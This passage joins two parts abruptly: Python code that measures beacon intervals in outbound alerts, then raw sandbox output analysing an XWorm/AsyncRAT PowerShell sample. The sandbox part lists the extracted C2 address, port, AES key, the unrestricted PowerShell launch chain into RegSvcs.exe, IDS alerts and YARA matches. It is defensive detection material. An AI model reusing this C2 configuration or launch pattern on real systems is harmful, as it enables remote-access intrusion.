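    The client source port is ignored so reconnects land in the same group."""
    by_flow = defaultdict(list)
    for ts, src, _sport, dst, dport in events:
        by_flow[(src, dst, dport)].append(parse_ts(ts))
    result = {}
    for flow, times in by_flow.items():
        times.sort()
        result[flow] = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return result


def dominant_interval(deltas, bin_size: float = 1.0):
    """Return (interval_seconds, share_of_deltas, jitter_seconds) for the most
    populated bin_size-wide bin, or None when there are no deltas. Jitter is
    the spread (max - min) of the deltas inside that bin."""
    if not deltas:
        return None
    binned = Counter(round(d / bin_size) for d in deltas)
    centre, count = binned.most_common(1)[0]
    members = [d for d in deltas if round(d / bin_size) == centre]
    return centre * bin_size, count / len(deltas), max(members) - min(members)


def summarise(events=OUTBOUND_CHECKINS) -> dict:
    """Per-flow summary: alert count, median gap, and the dominant beacon."""
    out = {}
    for flow, deltas in inter_arrivals(events).items():
        interval, share, jitter = dominant_interval(deltas)
        out[flow] = {
            "alerts": len(deltas) + 1,
            "median_delta_s": median(deltas),
            "beacon_interval_s": interval,
            "beacon_share": share,
            "beacon_jitter_s": jitter,
        }
    return out


if __name__ == "__main__":
    for flow, summary in summarise().items():
        print(flow, summary)
```

On these twelve alerts the median gap is about 9.7 s while the fullest bin is 12 s with five of eleven deltas and under 0.1 s of spread, which is the check-in period a responder would put in a hunting query; the same routine run over the server-side table above surfaces the separate 30 s cadence of the inbound alerts at 10:34:36, 10:35:06, 10:35:36 and so on.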



            AV Detection

Source: 0.2.powershell.exe.1dd8f552668.4.unpack; Malware Configuration Extractor: Xworm {"C2 url": ["176.113.115.228"], "Port": 4412, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: b.ps1; Virustotal: Detection: 13%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: 0.2.powershell.exe.1dd8f552668.4.unpack; String decryptor: 176.113.115.228
Source: 0.2.powershell.exe.1dd8f552668.4.unpack; String decryptor: 4412
Source: 0.2.powershell.exe.1dd8f552668.4.unpack; String decryptor: P0WER
Source: 0.2.powershell.exe.1dd8f552668.4.unpack; String decryptor: <Xwormmm>
Source: 0.2.powershell.exe.1dd8f552668.4.unpack; String decryptor: XWorm
Source: 0.2.powershell.exe.1dd8f552668.4.unpack; String decryptor: USB.exe
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdby source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbC source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb[& source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbs* source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb{& source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbj? source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb;&L source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Management.pdb@ source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Xml.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: n.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbK* source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405232656.000001DDA75F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdb/ source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Configuration.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdboft.NET/Framework/v4.0.30319/RegSvcs.exe// source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: %%.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp, WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbv source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbtP]q source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Drawing.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Management.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Management.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb4 source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb` source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49709 -> 176.113.115.228:4412
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.228:4412 -> 192.168.2.5:49709
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49709 -> 176.113.115.228:4412
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 176.113.115.228:4412 -> 192.168.2.5:49709
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49709 -> 176.113.115.228:4412
            Source: Malware configuration extractorURLs: 176.113.115.228
            Source: global trafficTCP traffic: 192.168.2.5:49709 -> 176.113.115.228:4412
            Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.228
            Source: powershell.exe, 00000000.00000002.2397399939.000001DD9F3EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.2378338667.000001DD8F939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.2397399939.000001DD9F3EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

            System Summary

            barindex
            Source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF84900103D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01506340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0150C2D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0150B598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_015084B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01505A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01502C88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01505728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01500FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 880
            Source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.1dd90374f68.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.1dd8f552668.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winPS1@7/14@0/1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
            Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\cbXZx2AFPWwoNOX6
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6568
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52lmgopr.pyp.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: b.ps1Virustotal: Detection: 13%
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3716" "2640" "2540" "2656" "0" "0" "2660" "0" "0" "0" "0" "0"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 880
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
